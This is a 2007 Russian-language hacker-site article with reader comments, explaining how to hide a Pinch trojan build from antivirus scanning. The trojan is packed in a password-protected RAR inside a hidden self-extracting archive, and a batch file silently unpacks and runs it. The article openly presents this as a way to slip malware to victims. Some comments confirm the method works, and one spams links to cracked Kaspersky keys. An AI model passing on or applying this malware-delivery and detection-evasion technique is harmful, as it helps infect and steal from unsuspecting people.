Прячем троян от антивирусов. » ..::XakepOK.ORG::..
XakepOK.ORG Logo
    
ГЛАВНАЯ  |  ФОРУМ  |  НОВОСТИ  |  СТАТЬИ  |  РЕЛИЗЫ  |  E-BOOKS  |  СКАЧАТЬ  |  WEB-TOOLS |  СНИФФЕР  |  ЮЗЕРБАРЫ  |  О НАС
Последние темы с форума
Название темы Пользователь Просмотров Ответов
INV4S10N Downloader v3.0 lexel441
BlackDownloader v.1.1 lexel521
Spider Downloader 1.0 lexel541
Reaper Downloader v2.0 lexel611
Gh0stly Downlader 2.0 lexel791
HHMultiDownloader v1.0 ( Coded in MASM & VB6 ) lexel671
BasicWebDownloader lexel762


Прячем троян от антивирусов. Категория: Статьи » Cracking

1 марта 2007 | Автор: nexgen | Просмотров: 3367 |
В данной статье излагается нехитрый, но 100% работающий способ сокрытия зараженного файла от ЛЮБЫХ антивирусов на Virustotal.Com. Для применения описанного способа нам понадобится программа WinRar. Описанное тестировалось на версии 3.62.
Итак, поехали...
У нас имеется троянский файл prog.exe, содержащий, к примеру, билд трояна Pinch 2.58. Необходимо, чтобы антивирус не детектировал его как зараженный. Для этого воспользуемся следующей методикой.
Во-первых создадим папку и положим туда билд трояна. Затем зайдем в папку с WinRar и скопируем в эту папку консольный архиватор rar.exe
Теперь создадим с помощью WinRar зашифрованый rar-архив, с именем prog.rar с файлом трояна(prog.exe).Пароль на архив к примеру, будет passw0rd.
Для распаковки и автозапуска трояна напишем bat-файл следующего содержания:

rar e -ppassw0rd prog.rar - здесь мы распаковываем троян в текущую папку. после ключа -p идет пароль
prog.exe - запускаем троян

Для того чтобы объединить 3 файла в 1, можно воспользоваться каким-нибудь джойнером(если он паблик, то будет палиться вся сброка) однако мы воспользуемся все тем же WinRar'ом.
Для этого создадим самораспаковывающийся архив, в который добавим файлы prog.rar и rar.bat с приведенным выше содержимым. При создании архива в диалоге "Имя и параметры архива" на вкладке "Общие" отметим чекбокс "Создать SFX-фрхив", затем перейдем на вкладку "Дополнительно", нажмем там кнопку "Параметры SFX". В открвышемся окне на вкладке "Общие" введем в поле ввода "Выполнить после распаковки" имя нашего bat-файла rar.bat
Затем перейдем на вкладку "Режимы", отметим там чекбокс "Распаковать во временную папку", в рамочке "Режим вывода информации" нажмем радиокнопку "Скрыть все", а в рамочке "Режим перезаписи" на всякий случай - "Перезаписывать все файлы"
Прячем троян от антивирусов.
Сохраним значения и создадим архив нажатием кнопок "OK". Теперь полученный файл можно смело впаривать жертве, не опасаясь, что Virustotal.Com обнаружит в нем вирусы. При запуске архив prog.rar автоматически распакуется во временную папку и будет расшифрован с указаным паролем.
Естественно, у описанного способа есть огромный недостаток - нормальный антивирус запалит троян в момент распаковки из второго архива. Однако многие жертвы не держат антивируса с актуальными базами, а грузат файлы на вирустотал, касперского и другие серваки, а при простом сканировании такой файл выявить практически невозможно.


          Комментарии: 20
#1 Комментарий от: -diger-

8 марта 2007 07:00 | ICQ: --
если я не ошибаюсь , достаточно просто пароль поставить.
#2 Комментарий от: СтанисLaw

8 марта 2007 12:49 | ICQ: --
Незнаю но попргобую обезатерльно
#3 Комментарий от: avgust

13 марта 2007 19:57 | ICQ: --
я обычно вирусы в архиве под поролем хранил)))... 123... намного проще
#4 Комментарий от: Scream9

14 марта 2007 09:23 | ICQ: --
Вот теперь Я знаю, где Антивирус держать!!!=))
#5 Комментарий от: Эллирия

17 марта 2007 20:30 | ICQ: --
Класс!!! Теперь можно вирусы хранить.
#6 Комментарий от: cc

18 марта 2007 18:32 | ICQ: --
Хе) Судя по комментам не все врубились для чего это нужно. но я конечно это знал
#7 Комментарий от: Che7777

19 марта 2007 04:22 | ICQ: --
Это то что надо wink
#8 Комментарий от: Duke

1 июля 2007 19:19 | ICQ: 8680692
Надо попробовать обязательно

Уже попробовал -все работает
#9 Комментарий от: cha0s

5 июля 2007 13:35 | ICQ: --
Давно так делают, но это не сокрытие... это пригодится, только, чтобы хранить у себя на компе архив с VX. Для впаривания этот метод равносилен НИЧЕМУ... я думаю все знают, что SFX сначала распаковывается, а потом запускается - так вот при запуске троян и спалится, так что смысла не вижу.
#10 Комментарий от: laurailonen

11 июля 2007 21:34 | ICQ: --
т е если кому-то это выслать, то троян обнаружится?
#11 Комментарий от: Waffen

11 августа 2007 19:43 | ICQ: --
А КАКИЕ ЕЩЕ СПОСОБЫ ЕСТЬ ДАЙТЕ ССЫЛКУ
#12 Комментарий от: Саня

16 августа 2007 23:20 | ICQ: --
Огромное спасибо за статью.

СМЕРТЬ ЛАМЕРАМ
#13 Комментарий от: Bubl

4 ноября 2007 21:59 | ICQ: --
>Огромное спасибо за статью.

>СМЕРТЬ ЛАМЕРАМ
угу тогда убей себя, т.к. статья лажовая.
#14 Комментарий от: sergeireset

12 декабря 2007 05:13 | ICQ: 247086945
Саня а ты сам то не ламмер!?
#15 Комментарий от: l0sth0pe

17 декабря 2007 23:23 | ICQ: --
ага..они не проверяются
#16 Комментарий от: PUPKIN

4 марта 2008 17:49 | ICQ: --
stackpoint_
#17 Комментарий от: GAVVVR

4 июня 2008 12:42 | ICQ: --
Спс. За статью. А почти все остальные ЛОШАРИКИ
#18 Комментарий от: rootkit

19 июня 2008 10:43 | ICQ: --
Вот уж не знал что winrar может быть руткитом! wink Вот насмешили то! Интересней новый руткит написать чем страдать ерундой с winrar! ИМХО ! А статья ровным счетом ни чего не отражает, да необидется на меня автор. wink
#19 Комментарий от: xakportal.at.ua

6 июля 2008 10:40 | ICQ: --
Возможно его и можно додуплить чо бы норм прятать тока я вот не понял как батом разархивировать рар с паролем
#20 Комментарий от: Alexey1

18 июля 2008 16:58 | ICQ: --
Здесь вы можете найти ключи, кряки, заморозку для всех весрий качперского _kav-kis-key.ucoz_/" _Всегда свежие ключи к Касперскому ТУТ_ прямые ссылки для скачивания _letitbit.net/download/4bd1e499063/kis-7.rar.html" _KIS 7 10 рабочих ключей качаем с Letitbit_ _http://vip-file.com/download/4bd1e4458732/kis-7.rar.html" _KIS 7 10 рабочих ключей качаем с Vip-File_

Добавление комментария

Ваше Имя:


Ваш E-Mail:





Капча:            Включите эту картинку для отображения кода безопасности
обновить код

Введите код:

Навигация
Главная
Форум
Новости

Статьи
»Web-hack
»ICQ-hack
»Cracking
»Кодинг
»Соц. инженерия
»Разное

SEO
Книги
Web-tools
PHP-прокси
Обмен файлами
Сниффер
Информер
Генератор юзербаров
IRC-канал
О нас
Вход в систему
Логин:
Пароль:
 
Топ новостей
» Китайскому хакеру грозит около 7 лет тюремного заключен ...
» C новым, 2009 годом, и Рождеством Христовым!
» Хакеры стремительно молодеют
» Фоторамки с вирусами
» В 2009 г. будут «править» банковские трояны и лже-антив ...
» Украинским провайдерам предложили облагородить интернет
» УФАС признала спамеров виновными в нарушении закона о р ...
» Хакеры скомпрометировали данные 1,5 млн клиентов банка ...
» Украинские СМИ записали Ющенко в хакеры
Опрос
Кто такой по-вашему хакер?

Это - Я!!!
Жаждущий знаний
Преступник
Ну я даже не знаю...
Герой нашего времени
Сесть мы всегда успеем


Друзья сайта
..::XakNet.Ru::..
..::GraBBerZ.CoM::..
Eugen.SU Webt00lZ
TEM.DP.UA
..::Illmax.ru::..
..::qseZ.ORG::..
..::Tolpa.ORG::..
..::ProLogic.ws::..
52Nn TeaM
hacklab.org.ru
..::web-a.info::..
Indetails.info
.::VzloM.IN::.
Evil Forest
.:BlackHack.Ru:.
Планету-хакерам
...::ICQ Primary Base::...
TGBR Community
Ссылки
Счетчики:
дизайн сайта: Rock Technologies — достичь вершин